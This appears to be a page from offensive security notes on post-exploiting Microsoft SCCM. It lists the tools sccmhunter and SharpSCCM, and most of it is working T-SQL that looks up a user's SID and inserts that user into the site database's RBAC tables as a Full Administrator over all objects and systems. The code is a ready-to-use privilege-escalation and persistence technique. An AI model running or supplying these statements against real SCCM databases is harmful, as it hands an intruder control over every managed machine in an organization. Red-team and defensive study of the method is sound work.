SCCM

Tools

sccmhunter - remote actions to sccm site

SharpSCCM - portable tool to postexploit

Postexploit

If we got database sccm, we can manually add sccm admin. Firstly get SID:

USE CM_<SITE_CODE>;
GO

DECLARE @binSID VARBINARY(85) = SUSER_SID('ICG\r_horse');
SELECT '0x' + SUBSTRING(sys.fn_varbintohexstr(@binSID), 3, 100) AS HexSID;

And now add admin

USE CM_ICG; -- ICG is site code
GO

INSERT INTO RBAC_Admins
  (AdminSID, LogonName, IsGroup, IsDeleted, CreatedBy, CreatedDate, ModifiedBy, ModifiedDate, SourceSite)
SELECT
  0x010500000000000515000000e2451490860880eb2477c972a5040000,         -- binary SID user in hex
  'icg\r_horse',                                                     -- login in format DOMAIN\User
  0,                                                                   
  0,                                                                   
  '', GETDATE(),                                                      -- CreatedBy/CreatedDate
  '', GETDATE(),                                                      -- ModifiedBy/ModifiedDate
  'ICG'                                                       -- Site Code
WHERE NOT EXISTS (
  SELECT 1 FROM RBAC_Admins WHERE LogonName = 'ICG\r_horse'
);  


DECLARE @AdminID INT = (
  SELECT AdminID FROM RBAC_Admins WHERE LogonName = 'icg\r_horse'
);


INSERT INTO RBAC_ExtendedPermissions (AdminID, RoleID, ScopeID, ScopeTypeID)
SELECT
  @AdminID,
  V.RoleID,
  V.ScopeID,
  V.ScopeTypeID
FROM (VALUES
  ('SMS0001R', 'SMS00ALL', 29),    -- Full Admin на All Objects
  ('SMS0001R', 'SMS00001', 1)      -- Full Admin на All Systems
) AS V(RoleID, ScopeID, ScopeTypeID)
WHERE NOT EXISTS (
  SELECT 1
  FROM RBAC_ExtendedPermissions
  WHERE AdminID = @AdminID
    AND RoleID = V.RoleID
    AND ScopeID = V.ScopeID
    AND ScopeTypeID = V.ScopeTypeID
);
GO

PreviousLDAP NextTRUSTS

Last updated 5 months ago